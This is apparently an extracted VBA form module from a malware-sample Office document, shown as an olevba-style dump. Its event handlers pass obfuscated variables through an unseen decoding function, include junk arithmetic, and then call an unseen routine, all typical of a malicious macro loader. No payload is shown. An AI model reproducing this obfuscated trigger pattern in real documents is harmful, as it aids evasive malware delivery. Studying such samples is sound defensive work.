Filename     : ./macros/cb2532cb15bc085e00958e36905e95648c320de1933cdf5bfc7df94b59e9e0cf
OLE stream   : Macros/VBA/gadferet
VBA filename : gadferet.frm
----------------------------------------
Attribute VB_Name = "gadferet"
Attribute VB_Base = "0{02C1835A-5C9B-45B0-B89D-61B48C784508}{00FBEAA6-42A2-4B0B-B7BB-DD33503A1200}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub jiangtemp_Change()
MsgBox "Ok"
End Sub

Private Sub Lianora_Change()
MsgBox "Ok"
End Sub

Private Sub ROUTE601_Change()
angParty = AYAKSVEZROK(andyhell)
veci2223 = AYAKSVEZROK(andyhell)
joomkill = AYAKSVEZROK(ardasmonk)
collinso = AYAKSVEZROK(ardasmonk)
rhonmuss = 75 - 18
rhonmuss = 70 + 23 * 100
rhonmuss = rhonmuss + 4
rhonmuss = 30 - rhonmuss * 71 - 4
cowboyslee angParty, veci2223, joomkill, collinso
End Sub
